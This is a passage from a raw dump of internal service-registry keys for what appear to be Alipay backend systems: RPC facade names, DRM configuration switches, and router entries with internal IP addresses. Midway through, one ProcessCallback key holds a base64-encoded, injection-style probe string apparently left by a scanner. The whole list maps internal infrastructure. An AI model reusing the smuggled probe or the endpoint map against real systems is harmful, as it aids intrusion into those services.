TER","com.alipay.mrchprod.common.service.facade.category.StandardCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arcstudio.common.service.facade.PackageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cspropmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.paramcore.common.service.newcache.client.api.ParmDataQueryProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbinteligentpromo.common.service.facade.api.SmartPromoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmTimeDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopAssignStatsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.pms.common.service.facade.api.MobileSystemParamMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.apshopcenterTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instradeprod.common.service.InsRenewalAcceptanceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.accountNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_hyp_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:overseamng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:transfercenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofapractice.rpc.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppConfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.LoginFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:accorderexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.AppManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.InvestOpinionFundBriefOpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.ContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimInstProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.cert.BFCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.DoneMigrateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:amlmatrix_alertFilterProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.uioservice.common.service.facade.api.ContentRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.system.ApprovalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.158.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gotone.common.service.api.CourierBizConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.credible.CredibleUmidService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ProviderServiceFacade:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.enablePricePreValidMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.184.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.cds.mng.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmemberprod.common.service.facade.api.tr.task.KbTaskDynamicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cfpcenter.common.service.facade.api.ZproxyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.common.astconfig.api.AstconfigManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.shareprofit.ShareProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:memberprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArInvoiceReceiptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.SmartgisService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.180.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.facade.api.AnnaUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.playbackmng.zplayback.report.service.ReportSerive:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.area.InstServiceAreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.analyze.alpharisk.core.infocode.drm.DrmUctInfocodeEngineResource.modelVariableTopNumStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.query.YebsContractQueryForTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.finpwm.mobileDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.minPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.sitecenter:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditrmp.facade.taskmanage.OperateLogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.NotificationMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbinteligentpromo.common.service.facade.api.OperateLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finboss.common.service.facade.user.UserTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bic.common.service.facade.SecurityChannelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:rcdisposal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthclaimmng.visit.facade.VisitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.follower.FollowerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.SettlePauseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.UserProfitRateRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:timeout@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antopo.common.service.facade.biz.table.onlinetable.TableApplicationRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.CustomerRiskRankService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.task.ArDivertOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.comparacenter.common.service.facade.load.api.ComParaDataLoadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.33.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_ostsValidationService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:uemprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.echo.platform.client.drm.EchoPlaybackConfigDrm.playbackTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:openexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.89.156.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alisis.core.service.compass.ServerCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.aliyun.apsarabase.euler.meta.service.facade.api.AppVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.32.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.resource.common.facade.api.FileOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wkprod.common.service.facade.rate.WkSpotRateConsultService:1.0@XFIRE@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.247#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.tscenterlib.common.service.facade.manager.MobileOpsPublishService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.island.IslandSignal.emergencyOperation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custrelation.service.facade.terminal.TerminalRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.zbdm.common.service.facade.biz.BizPartitionInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP-S-AFTS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.edeductcenter.common.service.facade.CreateEbppBillCallBack:1.0:ccrprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.common.service.facade.DataModelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundprod.common.service.facade.portfolio.PortfolioProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkmportal.service.loan.api.CollectBankStmtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.user.UserInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.LiquidateInstructionManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntSearchManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.208.61.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofagateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditsceneprod.planScheduleTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.license.MiniLicenseConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentHistoryQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flab.facade.api.picturespace.PictureSpaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.PricePlanQueryFacade:1.0:bksigncentre_pricePlanQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.staff.common.service.facade.PartnerCouponSumService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanP2pConfigDrm.p2pEnableStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:supergw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algo.common.service.facade.api.ALStrategyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.fieldreport.FieldReportQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.195.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.moaprod.common.query.MoaOrderRelationQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.zproxy.ZproxySampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.ArticleRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cloud.apfasmng.common.service.facade.appinstancegroup.AppInstanceGroupFacade:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finlsmicrogw:name=com.alipay.finlsmicrogw.ldc.ldcDrmConfig.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.query.FundBankTradeAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:eHl6IiBPciBhbnR3ZWJzY2Fuc1lXNTA9TXpNd01qUTROamt0TFRFeE1EQXdNakF4TUE=@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoitem.common.manage.facade.api.ItemQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.modeltable.ModelDefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.prod.common.service.facade.api.FamilyPayCardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alplatform.common.service.facade.api.WorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.common.service.facade.MSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.logistics.facade.QueryUserLogisticsDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.191.129#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.smartgis.SmartgisQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.CarRenewalPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_T_YLB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exratecenter.service.facade.api.ExClientRateMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_P_DPC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cfmng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.117.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.QuotationQueryFacade:1.0:gold@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_PRODMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.benefit.facade.BenefitServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.scene.ObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.biz.manage.manager.TitleManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minicenter.common.service.facade.api.admin.MiniAdminQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finscene#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.bizops.facade.AcctransHotIsolateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.wallstreetCreateVoucherTemplate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.airmng.common.service.facade.operationlog.OperationLogServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaxconnectplatform.common.service.yunfengdie.product.ProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.specialsubject.mng.SpecialSubjectMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.76.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.mng.MerchantTreeMngQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.TokenConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.DepartmentFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.service.TinyappInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.task.rpc.facade.activity.MerchantIdentifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundapplication.common.service.facade.api.newyearone.NewYearOnePromoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.CorpUserLifecycleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayeeDecisionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.endpoint.gwfacade.zhubalipay.zim.ZimLiteDispatchLdcService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.linglongsdk.server.facade.ComponentInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.cyberriskdatalib.core.service.query.CRQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.154.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundcore.common.service.facade.SeaLionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assay.common.facade.KnowledgeManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerforum.service.User:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.PayRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.risk.RiskDecisionConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.UniDataConfigService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.algo.common.service.facade.api.OrgInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.contract.service.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.elasticProxyConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.spcenter.facade.partner.EnterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.fixedmigrate.FixedMigrateConfigDrm.maxNumRowsPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotationcore.common.service.facade.api.quotation.QuotationSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:finvirtualta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceValidAuditNodePost@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.orderloan.OrderLoanService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.whiteListRPCLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MRCHSTM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftStatQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.ViolBulletinFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.dm.common.service.facade.api.DataSetConfigGenerateBySQLFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.permlimit.drm.mngConfig.reloadBlacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.AutoInsCompanyCooperationAreaFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadamodel.common.service.facade.api.cicadax.CicadaXServiceConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.38.64.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.25.172.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@mobileops#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mrchiswisdom.event.common.service.facade.api.event.EventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.security.auth.facade.features.AuthFeatureService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.fee.FeeCtlQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.ddsoss.DdsOssAccessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.autooperate.MerchantVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofaroute.service.impl.GroovyCommandResource_groovyScript#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTE","DATA_ID_11.166.235.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:escrowexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.query.ExchangeRateCurrencyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.ap.acquirecenter.service.facade.global.api.GlobalBizOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.vehownerprod.facade.admin.EtcToolAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.ptcore.common.service.facade.api.product.ProductConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.45.128.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#S